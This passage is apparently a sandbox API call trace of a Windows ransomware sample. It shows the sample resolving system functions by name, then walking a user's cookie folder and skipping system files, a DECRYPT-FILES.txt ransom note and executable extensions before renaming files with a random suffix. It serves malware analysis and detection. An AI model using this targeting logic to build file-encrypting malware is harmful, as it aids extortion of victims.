lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0079.579] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0079.579] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0079.580] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0079.580] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0079.580] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0079.580] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0079.580] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0079.580] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0079.580] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0079.580] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0079.580] lstrlenA (lpString="CREATEJOBSET") returned 12 [0079.580] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0079.580] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0079.580] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0079.580] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0079.580] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0079.580] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0079.580] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0079.580] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0079.580] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0079.580] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0079.580] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0079.580] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0079.580] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0079.580] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0079.580] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0079.580] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0079.580] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0079.580] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0079.580] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0079.580] lstrlenA (lpString="CREATEPIPE") returned 10 [0079.580] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0079.580] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0079.580] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0079.580] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0079.580] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0079.580] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0079.580] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0079.581] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0079.581] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0079.581] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0079.581] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0079.581] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0079.581] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0079.581] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0079.581] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0079.581] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0079.581] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0079.581] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0079.581] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0079.581] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0079.581] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0079.581] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0079.581] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0079.581] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0079.581] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0079.581] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0079.581] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0079.581] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0079.581] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0079.581] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0079.581] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0079.581] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0079.581] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0079.581] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0079.581] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0079.581] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0079.581] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0079.581] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0079.581] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0079.581] lstrlenA (lpString="CREATETHREAD") returned 12 [0079.581] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0079.582] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0079.582] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0079.582] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0079.582] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0079.582] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0079.582] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0079.582] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0079.582] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0079.582] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0079.582] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0079.582] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0079.582] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0079.582] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0079.582] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0079.582] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0079.582] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0079.582] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0079.582] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0079.582] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0079.582] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0079.582] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0079.582] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0079.582] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0079.582] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0079.582] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0079.582] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0079.582] lstrlenA (lpString="CTRLROUTINE") returned 11 [0079.582] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0079.582] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0079.582] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0079.582] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0079.582] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0079.582] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0079.582] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0079.582] lstrlenA (lpString="DEBUGBREAK") returned 10 [0079.582] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0079.582] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0079.583] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0079.583] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0079.583] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0079.583] lstrlenA (lpString="DECODEPOINTER") returned 13 [0079.583] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0079.583] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0079.583] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0079.583] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0079.583] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0079.583] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0079.583] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0079.583] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0079.583] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0079.583] lstrlenA (lpString="DELETEATOM") returned 10 [0079.583] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0079.583] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0079.583] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0079.583] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0079.583] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0079.583] lstrlenA (lpString="DELETEFIBER") returned 11 [0079.583] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0079.583] lstrlenA (lpString="DELETEFILEA") returned 11 [0079.583] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0079.583] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0079.583] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0079.583] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0079.583] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0079.583] lstrlenA (lpString="DELETEFILEW") returned 11 [0079.583] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0079.583] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0079.583] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0079.583] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0079.583] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0079.583] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0079.583] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0079.583] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0079.583] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0079.584] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0079.584] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0079.584] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0079.584] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0079.584] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0079.584] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0079.584] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0079.584] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0079.584] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0079.584] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0079.584] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0079.584] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0079.584] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0079.584] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0079.584] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0079.584] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0079.584] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0079.584] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0079.584] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0079.584] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0079.584] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0079.584] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0079.584] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0079.584] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0079.584] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0079.584] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0079.584] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0079.584] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0079.584] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0079.584] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0079.584] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0079.584] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0079.584] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0079.584] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0079.584] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0079.584] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0079.585] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0079.585] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0079.585] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0079.585] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0079.585] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0079.585] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0079.585] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0079.585] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0079.585] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0079.585] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0079.585] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0079.585] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0079.585] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0079.585] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0079.585] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0079.585] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0079.585] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0079.585] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0079.585] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0079.585] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0079.585] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0079.585] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0079.585] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0079.585] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt") returned 120 [0079.585] wsprintfW (in: param_1=0x3f2d4b4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt.agH7oHb") returned 128 [0079.586] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt.agH7oHb" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt.agh7ohb"), dwFlags=0x0) returned 1 [0079.586] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.586] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.587] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.587] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbf99e810, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf99e810, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf99e810, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x68, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@skadtec[1].txt", cAlternateFileName="5P37A2~1.TXT")) returned 1 [0079.587] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@skadtec[1].txt", lpString2="DECRYPT-FILES.txt") returned -1 [0079.587] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@skadtec[1].txt", lpString2="autorun.inf") returned -1 [0079.587] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@skadtec[1].txt", lpString2="boot.ini") returned -1 [0079.587] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@skadtec[1].txt", lpString2="desktop.ini") returned -1 [0079.587] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@skadtec[1].txt", lpString2="ntuser.dat") returned -1 [0079.587] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@skadtec[1].txt", lpString2="iconcache.db") returned -1 [0079.587] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@skadtec[1].txt", lpString2="bootsect.bak") returned -1 [0079.587] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@skadtec[1].txt", lpString2="ntuser.dat.log") returned -1 [0079.587] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@skadtec[1].txt", lpString2="thumbs.db") returned -1 [0079.587] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@skadtec[1].txt", lpString2="Bootfont.bin") returned -1 [0079.587] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@skadtec[1].txt") returned 35 [0079.587] lstrcmpiW (lpString1="txt", lpString2="lnk") returned 1 [0079.587] lstrcmpiW (lpString1="txt", lpString2="exe") returned 1 [0079.587] lstrcmpiW (lpString1="txt", lpString2="sys") returned 1 [0079.587] lstrcmpiW (lpString1="txt", lpString2="dll") returned 1 [0079.587] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned 76 [0079.587] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@skadtec[1].txt") returned 35 [0079.588] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" [0079.588] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\", lpString2="5p5nrgjn0js_halpmcxz@skadtec[1].txt" | out: lpString1="C:\\Users\\5p5NrGJn0jS 